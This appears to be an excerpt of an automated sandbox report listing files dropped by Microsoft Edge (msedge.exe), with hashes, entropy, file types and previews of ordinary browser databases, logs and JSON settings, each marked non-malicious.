                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):420
                                                                                                                                                                  Entropy (8bit):5.265705425088467
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7/oDvYfYebvqBZFUtNoZX/zG75JfYebvqBaJ:7/UYfYebvygNCGtJfYebvL
                                                                                                                                                                  MD5:2913583E0ADDEC4617C355D73ABC2D1D
                                                                                                                                                                  SHA1:88686ADF8C78077A349669FA7563E2393B02E302
                                                                                                                                                                  SHA-256:BFB57E096499B4C0EC79C2F075985077B838AF8A26CCFE968C485CA5C5DABBF9
                                                                                                                                                                  SHA-512:6932D74C81D538DCEAC50B39200580496A9C6384A6B1F971B0D8D219706A70CEBF8D027AAE552F3E28B230EF92DB12F010A6980F23B94FF1A02C77B0D5239C23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:18:14.290 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/06-17:18:14.291 1870 Recovering log #3.2025/01/06-17:18:14.301 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                  Entropy (8bit):5.248498112834731
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/Nq2Pwkn23oH+TcwtpIFUtNcZmwzckwOwkn23oH+Tcwta/WLJ:7/NvYfYebmFUtNc/zc5JfYebaUJ
                                                                                                                                                                  MD5:DF21A76B185CDF6F473F9218DD1889EC
                                                                                                                                                                  SHA1:6416E314240B36D26C89F96BFFE6B9BD094D2FC6
                                                                                                                                                                  SHA-256:03376411938BFFD8349EC91280D94221AEEEE5B472D5252BFB0CB1D1BCF83A71
                                                                                                                                                                  SHA-512:DEFAE968D6DAA051F51C10B9B2C24E8E439BC49A7CAC3159F14C3EEB459EFEA9CB638F301B14ABE9512E0449B73E8D540A2EF378FA05C550F6E7C9CCB1FFD51D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.339 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/06-17:17:54.515 1eb4 Recovering log #3.2025/01/06-17:17:54.515 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):0.26707851465859517
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                                  MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                                  SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                                  SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                                  SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):184320
                                                                                                                                                                  Entropy (8bit):1.0672194850249064
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:QSqzWMMUfTFnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYBSn6:QrzWMffBnzkkqtXnTK+hNH+5EVumn
                                                                                                                                                                  MD5:DF781DD99130CC30C330A59CF7985167
                                                                                                                                                                  SHA1:5BCF92A1459DC5350500088AEB46D2EB9CA7CDA9
                                                                                                                                                                  SHA-256:9505B25A0BDC146198AEAAB70CD417FA41C0850939358DAB5A7D3F0507A00520
                                                                                                                                                                  SHA-512:EA8AFFE2172BEF7831973897CBBFBE41E623DDED2BAA48E6A2C6E0528943DB664569B839D624FA07FB1750AF3912FAB20E7810BD2307BE92FB4D8F5D035A0814
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):14336
                                                                                                                                                                  Entropy (8bit):0.7836182415564406
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                                  MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                                  SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                                  SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                                  SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.4668379892206187
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0mQip+U:v7doKsKuKZKlZNmu46yjx0ni5
                                                                                                                                                                  MD5:9DB1D9902613D9ED9F7F1B9812D59900
                                                                                                                                                                  SHA1:A16305DED5CA032D5FCED6D15BB2BA5761AB1CFE
                                                                                                                                                                  SHA-256:D5105C0DCA0B8E9083FA1D1E015BA6F99EB6590FECFA02F9F9A1432EE4D18CB4
                                                                                                                                                                  SHA-512:0BC5E9847CD9308B0592963D018B3482748F5385FE394C1131B1B458D5873ED6A1A367401BA1BDC92DD9712B9CFD2E128C8B5D41F9FA04B3414197E0660020D2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39660
                                                                                                                                                                  Entropy (8bit):5.5627741378414255
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:fgkBJP7pLGLhbZWPOkfXl8F1+UoAYDCx9Tuqh0VfUC9xbog/OVCfZCVw3rwyT+DD:fgkBJJchbZWPOkfXlu1jaLfZEwkyTc6y
                                                                                                                                                                  MD5:0A4DE3D0FF0D5DE33A82C897F7617675
                                                                                                                                                                  SHA1:487598B72E0C2D9D0C8D465783B1443E73DAC523
                                                                                                                                                                  SHA-256:36F8A2B5C41B6EBF21B0628F8567BD7E22EDDF06F4A4D0C3E5CC906316A0CF60
                                                                                                                                                                  SHA-512:0D6E4D499114A3DBECB7C3A70E9218E41E9FA83789AF59AD5BA16151CA6AFFCBA7B85C772EAB8509ECC2A8B99B8E52B722898717CEE2B358EDC464046EF67238
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380675474265892","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380675474265892","location":5,"ma
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (18342), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18343
                                                                                                                                                                  Entropy (8bit):5.4574557371487415
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZiuaba4uypYJVelS6rDyLiY6YIYGYeLPFrkcQbxT8fpj+Fl0QwVv7P:sVsLAJu4YJVel3DJTtA6pUqQwl7P
                                                                                                                                                                  MD5:2987237ED0A04F22410948E892ADD6C4
                                                                                                                                                                  SHA1:6030DB8F081BEAA990D089DC64C3D1F675ACC61C
                                                                                                                                                                  SHA-256:2745A5CE121390FED23F1A279A022742391C83215E553EDF8B4AE0BA8CF9725D
                                                                                                                                                                  SHA-512:219EC12D3FCD859D2791C2FD4C77F6CB41CEAD87A65C77FDCE75D90501B7E5FDA4E4F1895617080579DE9A78C2FA60AC9325459E2B7C9401792B930B50FCC302
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (18232), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18233
                                                                                                                                                                  Entropy (8bit):5.459564083168723
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZiuaba4uypYJVelS6rDyLiY6YIYGYeLPFrkcQbxT8fpj+Fl0QwVZ2P:sVsLAJu4YJVel3DJTtA6pUqQwb2P
                                                                                                                                                                  MD5:8DF69F7899B12D4942D6E3B2AC1317CD
                                                                                                                                                                  SHA1:0F837AB3A4AC4B57D1302492DD4273B2BF03EB1E
                                                                                                                                                                  SHA-256:B7E3142424698FE81390DBE8A7B4212F1DA4249BA8F69ABAB584EE7C08DCD0B0
                                                                                                                                                                  SHA-512:0D294B0476018A1595F6B3020102DA14664F07392D3F1632B3F71D8E10A246DF0404C6FCB9926094569CF394A2854A280771A17539C08430412ED4915F0134C2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                  Entropy (8bit):0.35226517389931394
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                                  MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                                  SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                                  SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                                  SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.08707491431787262
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:GEl/rCkyoel/rCkqtz9XHl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/UnnoiWrL:btWk5etWkGFnnnnnnnnnnnpwE
                                                                                                                                                                  MD5:4B0AD90E25D31647C02E495B95D1E828
                                                                                                                                                                  SHA1:57B52DC8E102CB41DB50CD8F31F758D3C04115B2
                                                                                                                                                                  SHA-256:DEDCD815B1763BD2E0A3CCEEEF3F427959FAA5B509CFAA25D45D4073663491C7
                                                                                                                                                                  SHA-512:70A43927743B0EBD9A6B7A88998FD96D09F45ECAD30A8E52B5A8D3CBA47224B55414D4133F312D2F02555E2145DBEA8E5E79F52CA53A16FAE7F405FD3DAF3908
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):247232
                                                                                                                                                                  Entropy (8bit):0.8292815736463269
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:1rEXrzxDXzRKiO6aMOIaFOkWYOycDOnsK1nOsv8VxTKyTyDUyWyCjy0xytO:APJB
                                                                                                                                                                  MD5:62857CC113B9D116A392DCA6A234F991
                                                                                                                                                                  SHA1:062C57576DD72C927D7F0E8A615FD705EA0D7D2A
                                                                                                                                                                  SHA-256:5174090EA2766D6FCF2C15A6527782F8E8F127034ABB48E8741C8238F5F79A45
                                                                                                                                                                  SHA-512:0041CDD97CBF18DEC62969504D28895B0F8E910DB6775AB4F07043C879F216776E6B69A9DDA774BC7EB3637AACD269E2C89A3AF3DF80EC2972FCF1EC085CAF27
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):155
                                                                                                                                                                  Entropy (8bit):4.217326649266659
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:VVXntjQPEnjQvxljl03PFl3seGKT9rcQ6xwUn:/XntM+4ljlOPFl3sedhOh
                                                                                                                                                                  MD5:E2A5018C48A13FC609B876E30C1B9656
                                                                                                                                                                  SHA1:B63E2892DBE1D564444648928B7A0A5E0BAFEAE5
                                                                                                                                                                  SHA-256:CCB1C64DC802D5F25D38B6E2FB5B3599A5EA831BDC803C78DE1D1612BFBAF6AF
                                                                                                                                                                  SHA-512:B63A8324B6AD729566C0C10A7B1169965E690553344A949834C5B747C124467F80D9FC6BC7651123F501169EE006A0ACBEB6475C7EEFE8CF4686862C1FD82E43
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1..&f.................&f...................0................39_config..........6.....n ...1
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
